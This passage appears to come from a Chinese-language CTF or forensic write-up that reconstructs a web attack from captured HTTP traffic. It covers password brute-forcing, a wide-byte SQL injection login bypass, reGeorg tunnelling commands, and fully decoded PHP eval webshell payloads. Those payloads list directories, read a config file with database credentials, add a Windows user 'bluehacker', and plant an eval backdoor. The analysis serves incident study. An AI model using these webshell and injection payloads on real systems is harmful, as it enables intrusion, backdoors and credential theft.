username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=apple&lang=&option=com_login&task=login&return=aW5kZXgucGhw&f2426d9ea34e95fe916e6309d7028835=1
username=admin&passwd=apple&option=com_login&task=login&return=aW5kZXgucGhw&2bb30f381fad54b0ca7f4088e7e9cc97=1

可以看到攻击者在之前对管理员密码进行了爆破
最后出现了两个相同的账号密码为 admin/apple
猜测极有可能是正确的密码
对比一下之前和最后的相应包


image.png

尝试一个错误密码的时候 , 返回了 303 See Other , 并重定向到了 /administrator/index.php
在 index.php 内容中也可以找到 :


image.png
<p class="alert-message">Username and password do not match or you do not have an account yet.</p>

而在真正登录成功的时候 , 虽然也是返回 303 , 重定向到 /administrator/index.php
但是可以发现 , index.php 的内容是明显不同的

image.png

攻击者经过爆破密码得到了管理员的密码 admin/apple

到这里 Jshell 的分析应该差不多了

接下来看一下攻击者上传如何上传 Bshell
Bshell 是存在于内网的 , 攻击者通过 reGeord 进行内网渗透 , 跳板文件名为 tunnel.php
这里存在一个小技巧
tunnel.php 在实现的时候 , 每一个独立的 TCP 连接会由同一个 Session 维护
所以可以根据 PHPSESSID 来跟踪一个发向内网的 HTTP 请求
发起一个新的链接的 URL 会是这样 ?cmd=connect&target=8.8.8.8&port=8888
发送数据会是这样 ?cmd=forward
读取数据 : ?cmd=read
断开连接 : ?cmd=disconnect

image.png

在这里进行了登录


image.png
admin_name=simple%d5%27%20or%201%3d1%23&admin_pwd=simple&submit=%B5%C7%C2%BC&act=do_login
// 这里直接使用了宽字节注入成功登录
image.png

然后使用模板编辑器 /admin/tpl_manage.php 对 ../data/config.php 进行了编辑

image.png
image.png

这里攻击者已经创建了 webshell , 接下来分析攻击者是如何利用 webshell 的

grep -o 'Bshell.*' http.txt > Bshell
with open("Bshell") as f:
    for line in f:
        import urllib
        print "-" * 32
        data = ("Bshell=@eval(ba" + urllib.unquote(line)[16:-1])
        print data
        data = data.split("&")
        for i in data[1:]:
            d = i.split("=")
            key = d[0]
            value = ("".join("%s=" % (i) for i in d[1:]))[0:-1]
            try:
                print "%s=%s" % (key, value.decode("base64"))
            except:
                print "%s=%s" % (key, (value + (4 - len(d[1]) % 4) * "=").decode("base64"))
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// 获取目标服务器系统信息, 用户名
->|C:/phpstudy/WWW/bluecms/data C:D:    Windows NT OA-43EAD51FB6C5 5.1 build 2600 (Windows XP Professional Service Pack 3) i586(Administrator)|<-

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// 获取目标服务器 C:\\ 目录的所有文件
addons/  2017-08-29 03:38:21 0   0777
Documents and Settings/ 2017-09-06 03:58:45 0   0777
phpstudy/   2017-09-06 03:39:12 0   0777
Program Files/  2017-09-06 03:53:46 0   0555
RECYCLER/   2017-08-29 03:37:07 0   0777
System Volume Information/  2017-07-24 03:56:23 0   0777
WINDOWS/    2017-08-28 06:55:01 0   0777
AUTOEXEC.BAT    2017-07-24 03:54:32 0   0777
boot.ini    2017-07-24 03:52:40 211 0666
bootfont.bin    2008-04-14 12:00:00 322730  0444
CONFIG.SYS  2017-07-24 03:54:32 0   0666
IO.SYS  2017-07-24 03:54:32 0   0444
MSDOS.SYS   2017-07-24 03:54:32 0   0444
NTDETECT.COM    2008-04-14 12:00:00 47564   0555
ntldr   2008-04-14 12:00:00 257728  0444
pagefile.sys    2017-09-07 11:47:21 805306368   0666

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// 获取目标服务器 C:\\ 目录的所有文件

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// 执行系统命令 net user bluehacker redhacker1@3 /add

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// 执行系统命令 net user bluehacker redhacker1@3 /add

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 获取目标服务器 C:\\phpstu 目录的所有文件
->|./   2017-09-07 08:26:56 0   0777       
../ 2017-09-06 03:39:12 0   0777           
bluecms/    2017-09-07 08:27:01 0   0777   
metinfo/    2017-09-07 07:05:58 0   0777   
phpMyAdmin/ 2017-09-06 03:38:48 0   0777   
l.php   2014-02-27 15:02:21 21201   0666   
phpinfo.php 2013-05-09 12:56:36 23  0666   
|<-                                        


--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 获取目标服务器 C:\\phpstu 目录的所有文件

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\
// 获取目标服务器 C:\\phpstudy\\WWW\\ 目录的所有文件
->|./   2017-09-07 08:27:01 0   0777                   
../ 2017-09-07 08:26:56 0   0777
admin/  2017-09-07 08:27:02 0   0777
api/    2017-09-07 08:27:01 0   0777
data/   2017-09-07 08:33:05 0   0777
images/ 2017-09-07 08:27:01 0   0777
include/    2017-09-07 08:26:59 0   0777
install/    2017-09-07 08:26:57 0   0777
js/ 2017-09-07 08:26:57 0   0777
templates/  2017-09-07 08:26:56 0   0777
uc_client/  2017-09-07 08:26:56 0   0777
ad_js.php   2010-02-08 13:40:00 869 0666
ann.php 2010-02-08 13:39:54 2478    0666
category.php    2010-02-08 13:47:48 8821    0666
comment.php 2010-02-08 13:39:40 3531    0666
guest_book.php  2010-02-08 13:51:28 2538    0666
index.php   2010-02-08 13:40:08 7471    0666
info.php    2010-02-08 13:50:02 4527    0666
info_index.php  2010-02-08 13:50:50 1869    0666
news.php    2010-01-07 10:02:34 3477    0666
news_cat.php    2010-02-08 13:54:52 2069    0666
publish.php 2010-02-09 03:40:36 9185    0666
robots.txt  2009-12-01


--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\
// 获取目标服务器 C:\\phpstudy\\WWW\\bluecms\\ 目录的所有文件
->|./   2017-09-07 08:33:05 0   0777                
../ 2017-09-07 08:27:01 0   0777
admin/  2017-09-07 08:27:01 0   0777
backup/ 2017-09-07 08:27:01 0   0777
cache/  2017-09-07 08:27:01 0   0777
compile/    2017-09-08 02:30:03 0   0777
upload/ 2017-09-07 08:27:01 0   0777
bannedip.cache.php  2017-09-08 09:24:52 25  0666
config.cache.php    2017-09-07 08:33:05 550 0666
config.php  2017-09-08 09:27:58 276 0666
index.htm   2009-10-02 12:46:24 894 0666
update_log.txt  2017-09-07 08:42:58 8   0666

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 获取目标服务器 C:\\phpstu 目录的所有文件

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGNvbmZpZy5waHA=
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\config.php
// 获取 C:\\phpstudy\\WWW\\bluecms\\data\\config.php 文件内容
->|<?php                            
$dbhost   = "localhost";                                    
$dbname   = "bluecms";                      
$dbuser   = "root";                 
$dbpass   = "123456";               
$pre    = "blue_";                  
$cookiedomain = '';                  
$cookiepath = '/';                  
@eval($_POST['Bshell']);            
define('BLUE_CHARSET','gb2312');                        
define('BLUE_VERSION','v1.6');                            
?>|<-                               

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// 将 <?php eval($_POST['cmd_shell']);?> 写入 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
